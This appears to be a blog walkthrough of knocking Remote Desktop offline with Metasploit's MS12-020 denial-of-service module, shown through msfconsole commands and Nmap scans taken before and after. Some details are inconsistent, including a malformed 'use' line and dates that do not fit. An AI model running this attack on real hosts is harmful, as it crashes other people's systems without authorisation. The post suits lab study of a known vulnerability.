3389/tcp open ms-term-serv auxiliary/dos/windows/rdp/ms12_020_maxchannelids

Caution this simply causes the remote machine to reboot and stops RDP from working.

To restart RDP you need to go to System Properties and untick Remote Desktop/ Apply / Then retick Remote Desktop / Apply

Proving 3389/tcp open  ms-term-serv is available

Starting Nmap 5.51SVN ( http://nmap.org ) at 2011-05-25 13:13 BST
Nmap scan report for IP-Address
Host is up (0.00028s latency).
Not shown: 991 closed ports
PORT     STATE SERVICE
23/tcp   open  telnet
25/tcp   open  smtp
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
1027/tcp open  IIS
3389/tcp open  ms-term-serv
MAC Address: 01:02:03:79:41:21 (Micky Mog)

Nmap done: 1 IP address (1 host up) scanned in 0.59 seconds

use auxiliary/3389/tcp open  ms-term-serv
set rhost

msf > search ms12-020

Matching Modules
================

Name                                              Disclosure Date  Rank    Description
—-                                              —————  —-    ———–
auxiliary/dos/windows/rdp/ms12_020_maxchannelids  2011-03-16       normal  MS12-020 Microsoft Remote Desktop Use-After-Free DoS

msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

msf  auxiliary(ms12_020_maxchannelids) > set rhost IP-Address
rhost => IP-Address

msf  auxiliary(ms12_020_maxchannelids) > exploit

[*] 10.255.245.136:3389 – Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 10.255.245.136:3389 – 210 bytes sent
[*] 10.255.245.136:3389 – Checking RDP status…
[+] 10.255.245.136:3389 seems down
[*] Auxiliary module execution completed

—————————————————————————————–

nmap now shows port 3389/tcp open  ms-term-serv not available
msf  auxiliary(ms12_020_maxchannelids) > nmap IP-Address –open -sS
[*] exec: nmap IP-Address –open -sS

Starting Nmap 5.51SVN ( http://nmap.org ) at 2011-05-25 13:10 BST
Nmap scan report for IP-Address
Host is up (0.00064s latency).
Not shown: 977 closed ports, 20 filtered ports
PORT     STATE SERVICE
23/tcp   open  telnet
25/tcp   open  smtp
1028/tcp open  unknown
MAC Address: 01:02:03:79:41:21 (Micky Mog)

Nmap done: 1 IP address (1 host up) scanned in 1.95 seconds

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s